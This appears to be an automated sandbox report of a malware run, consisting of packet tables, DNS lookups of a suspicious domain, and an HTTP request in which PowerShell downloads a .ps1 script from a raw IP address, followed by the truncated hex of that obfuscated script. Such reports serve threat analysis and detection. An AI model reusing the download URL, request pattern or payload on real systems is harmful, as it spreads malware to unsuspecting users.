                                                                                                                                                                                                              Nov 7, 2024 17:55:22.555943012 CET44349724104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:22.578532934 CET49720443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:22.578545094 CET44349720104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.063602924 CET44349724104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.063719988 CET44349724104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.063863993 CET49724443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.063992023 CET49724443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.064008951 CET44349724104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.084112883 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.084139109 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.084359884 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.084604025 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.084614992 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.285692930 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.285713911 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.285923004 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.286771059 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.286782980 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.297574997 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.297760010 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.299412966 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.299420118 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.299710035 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.300848007 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.301042080 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.301105022 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.301232100 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.301239967 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.702147007 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.702574968 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.702593088 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.704427004 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.704605103 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.705866098 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.706043959 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.760483980 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.760497093 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.807399035 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.112797022 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.112991095 CET44349725104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.113137960 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.113138914 CET49725443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.164298058 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.164320946 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.164479971 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.164685011 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.164699078 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.379256964 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.379486084 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.380567074 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.380589008 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.381006002 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382220030 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382353067 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382371902 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382397890 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382419109 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382478952 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382529020 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382672071 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.382724047 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.290704966 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.290993929 CET44349727104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.291066885 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.291193008 CET49727443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.359100103 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.359164000 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.359339952 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.359621048 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.359659910 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.580908060 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.581150055 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.582042933 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.582067966 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.582725048 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.584547043 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.584698915 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:25.584718943 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.140902042 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.140981913 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.141170025 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.141287088 CET49728443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.141300917 CET44349728104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.255450010 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.255486012 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.255698919 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.255927086 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.255944014 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.470129967 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.470376015 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.471199989 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.471223116 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.471663952 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.472795010 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.472886086 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:26.472908020 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.930053949 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.930265903 CET44349729104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.930421114 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.930557013 CET49729443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.932805061 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.932867050 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.933094978 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.933289051 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:27.933327913 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.150727034 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.150953054 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.151820898 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.151859999 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.152548075 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.153533936 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.153533936 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.153728008 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.686719894 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.686970949 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.687128067 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.687182903 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.687215090 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.687237978 CET49730443192.168.11.20104.21.19.177
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.687257051 CET44349730104.21.19.177192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:33.713747025 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:33.713848114 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:33.714000940 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:41.520311117 CET49726443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:55:41.520354033 CET44349726142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.515894890 CET4974080192.168.11.20142.251.32.99
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.618458033 CET8049740142.251.32.99192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.619442940 CET4974080192.168.11.20142.251.32.99
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.619442940 CET4974080192.168.11.20142.251.32.99
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.722201109 CET8049740142.251.32.99192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.722769976 CET8049740142.251.32.99192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:42.775127888 CET4974080192.168.11.20142.251.32.99
                                                                                                                                                                                                              Nov 7, 2024 17:55:43.621510983 CET4969380192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:55:43.621681929 CET49692443192.168.11.2013.89.178.26
                                                                                                                                                                                                              Nov 7, 2024 17:55:43.729182005 CET8049693192.229.211.108192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:43.729834080 CET4969380192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:55:43.810539007 CET4434969213.89.178.26192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:43.811429977 CET49692443192.168.11.2013.89.178.26
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.664190054 CET4968980192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.772887945 CET8049689192.229.211.108192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.773086071 CET4968980192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.849935055 CET4968880192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.897111893 CET49694443192.168.11.2052.159.126.152
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.957408905 CET8049688192.229.211.108192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.957556009 CET4968880192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:55:49.020756006 CET4434969452.159.126.152192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:49.068840981 CET49694443192.168.11.2052.159.126.152
                                                                                                                                                                                                              Nov 7, 2024 17:55:49.088330030 CET49703443192.168.11.2023.44.201.16
                                                                                                                                                                                                              Nov 7, 2024 17:55:52.966718912 CET49691443192.168.11.2040.126.24.81
                                                                                                                                                                                                              Nov 7, 2024 17:55:52.966752052 CET49695443192.168.11.2040.126.24.81
                                                                                                                                                                                                              Nov 7, 2024 17:55:53.096609116 CET4434969140.126.24.81192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:53.096618891 CET4434969540.126.24.81192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:53.096813917 CET49691443192.168.11.2040.126.24.81
                                                                                                                                                                                                              Nov 7, 2024 17:55:53.096813917 CET49695443192.168.11.2040.126.24.81
                                                                                                                                                                                                              Nov 7, 2024 17:56:01.706996918 CET4434967323.43.85.34192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:01.707015991 CET4434967323.43.85.34192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:01.707242012 CET49673443192.168.11.2023.43.85.34
                                                                                                                                                                                                              Nov 7, 2024 17:56:03.082391024 CET4434968123.44.201.41192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:03.082406998 CET4434968123.44.201.41192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:03.082698107 CET49681443192.168.11.2023.44.201.41
                                                                                                                                                                                                              Nov 7, 2024 17:56:03.087337971 CET44349672204.79.197.203192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.230072975 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.230096102 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.230257034 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.230633974 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.230681896 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.648813009 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.649251938 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.649291992 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.650369883 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.650871992 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.651150942 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:23.700683117 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:33.650176048 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:33.650283098 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:33.650434971 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:43.469913960 CET4974080192.168.11.20142.251.32.99
                                                                                                                                                                                                              Nov 7, 2024 17:56:43.573015928 CET8049740142.251.32.99192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:43.573199034 CET4974080192.168.11.20142.251.32.99
                                                                                                                                                                                                              Nov 7, 2024 17:56:45.842900038 CET49750443192.168.11.20142.251.35.164
                                                                                                                                                                                                              Nov 7, 2024 17:56:45.842945099 CET44349750142.251.35.164192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:48.887051105 CET49694443192.168.11.2052.159.126.152
                                                                                                                                                                                                              Nov 7, 2024 17:56:48.887216091 CET49709443192.168.11.2052.159.127.243
                                                                                                                                                                                                              Nov 7, 2024 17:56:49.011298895 CET4434969452.159.126.152192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:49.011332989 CET4434970952.159.127.243192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:49.060252905 CET49694443192.168.11.2052.159.126.152
                                                                                                                                                                                                              Nov 7, 2024 17:56:49.060317993 CET49709443192.168.11.2052.159.127.243
                                                                                                                                                                                                              Nov 7, 2024 17:56:56.046123981 CET4434968440.126.24.81192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:57.928348064 CET8049680192.229.211.108192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:57.928605080 CET4968080192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:56:58.236305952 CET8049679192.229.211.108192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:58.236598015 CET4967980192.168.11.20192.229.211.108
                                                                                                                                                                                                              Nov 7, 2024 17:57:07.530579090 CET443496964.153.57.10192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:57:07.530617952 CET443496964.153.57.10192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:57:07.530771017 CET49696443192.168.11.204.153.57.10
                                                                                                                                                                                                              Nov 7, 2024 17:57:07.530849934 CET49696443192.168.11.204.153.57.10
                                                                                                                                                                                                              Nov 7, 2024 17:57:07.644536972 CET443496964.153.57.10192.168.11.20
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Nov 7, 2024 17:55:02.627357006 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                              Nov 7, 2024 17:55:03.378921986 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                              Nov 7, 2024 17:55:04.144280910 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                              Nov 7, 2024 17:55:13.869865894 CET5145453192.168.11.201.1.1.1
                                                                                                                                                                                                              Nov 7, 2024 17:55:13.996067047 CET53514541.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.360069036 CET573241900192.168.11.20239.255.255.250
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.370208025 CET53616631.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.443064928 CET53573231.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.524534941 CET5803553192.168.11.201.1.1.1
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.524666071 CET4946453192.168.11.201.1.1.1
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.627243996 CET53494641.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.627502918 CET53580351.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:20.201211929 CET53528351.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:20.364944935 CET573241900192.168.11.20239.255.255.250
                                                                                                                                                                                                              Nov 7, 2024 17:55:21.372302055 CET573241900192.168.11.20239.255.255.250
                                                                                                                                                                                                              Nov 7, 2024 17:55:22.481601000 CET573241900192.168.11.20239.255.255.250
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.181535006 CET5804553192.168.11.201.1.1.1
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.181617022 CET6301753192.168.11.201.1.1.1
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.284454107 CET53580451.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.284806967 CET53630171.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:24.899877071 CET53652201.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:28.273586035 CET53613371.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:46.773217916 CET53507391.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:55:48.282248020 CET53561101.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:12.517052889 CET53640311.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:19.397077084 CET53500561.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:45.947165012 CET53619431.1.1.1192.168.11.20
                                                                                                                                                                                                              Nov 7, 2024 17:56:51.672255993 CET138138192.168.11.20192.168.11.255
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Nov 7, 2024 17:55:13.869865894 CET192.168.11.201.1.1.10x46a3Standard query (0)knifedxejsu.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.524534941 CET192.168.11.201.1.1.10x827eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.524666071 CET192.168.11.201.1.1.10xa4bbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.181535006 CET192.168.11.201.1.1.10x49cbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.181617022 CET192.168.11.201.1.1.10xcf87Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Nov 7, 2024 17:55:13.996067047 CET1.1.1.1192.168.11.200x46a3No error (0)knifedxejsu.cyou104.21.19.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:13.996067047 CET1.1.1.1192.168.11.200x46a3No error (0)knifedxejsu.cyou172.67.187.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.627243996 CET1.1.1.1192.168.11.200xa4bbNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:19.627502918 CET1.1.1.1192.168.11.200x827eNo error (0)www.google.com142.251.35.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.284454107 CET1.1.1.1192.168.11.200x49cbNo error (0)www.google.com142.251.35.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 7, 2024 17:55:23.284806967 CET1.1.1.1192.168.11.200xcf87No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                              • knifedxejsu.cyou
                                                                                                                                                                                                              • www.google.com
                                                                                                                                                                                                              • 147.45.44.131
                                                                                                                                                                                                              • c.pki.goog
                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.11.2049710147.45.44.131809176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.517822027 CET278OUTGET /infopage/bhdh552.ps1 HTTP/1.1
                                                                                                                                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                                                                                                              Host: 147.45.44.131
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 7, 2024 17:55:10.704555988 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Thu, 07 Nov 2024 16:55:10 GMT
                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                              Last-Modified: Wed, 06 Nov 2024 18:18:11 GMT
                                                                                                                                                                                                              ETag: "bde4-626428a5a6c47"
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Content-Length: 48612
                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Data Raw: 0d 0a 24 44 54 6c 70 72 6d 69 62 54 52 51 51 31 30 76 62 6f 76 52 44 6b 35 56 44 4d 45 6d 74 4f 4a 48 61 45 42 47 6d 54 78 50 78 55 68 31 52 49 78 4f 57 6b 55 6b 50 6c 64 6c 37 77 69 63 6d 7a 6f 56 4b 4b 66 4d 5a 54 4a 53 72 66 54 6a 43 45 46 75 50 71 30 4a 75 5a 72 6f 31 51 39 70 62 55 32 78 35 55 51 47 32 6c 6f 42 61 43 73 39 31 74 69 32 72 6e 58 76 38 66 32 6c 53 71 6b 4a 6b 55 67 36 4e 56 4f 69 6e 79 32 33 43 5a 38 72 36 53 56 37 37 47 79 6f 77 36 5a 71 72 35 6f 62 42 66 52 51 57 57 56 46 66 41 65 73 57 75 74 4a 47 62 4f 41 34 4d 62 64 56 73 61 67 77 59 71 53 4b 71 31 56 48 53 35 4c 76 52 73 36 32 46 32 43 63 50 6a 51 51 6f 48 6f 45 64 74 33 6c 66 49 52 4b 57 69 35 32 37 43 6e 46 44 45 4d 54 46 4c 51 5a 37 44 68 65 39 42 56 69 64 53 33 59 43 5a 50 49 62 56 47 58 78 61 46 4e 76 4c 4e 6a 75 35 7a 32 64 44 4f 62 31 63 61 55 57 6d 70 50 38 59 43 64 6f 45 69 69 46 73 31 77 79 33 69 59 6f 63 6e 48 54 42 6c 7a 4c 64 67 79 6c 6d 42 4c 6c 70 65 36 49 39 75 71 6d 51 58 6b 62 52 64 78 75 4d 35 69 7a 68 77 [TRUNCATED]
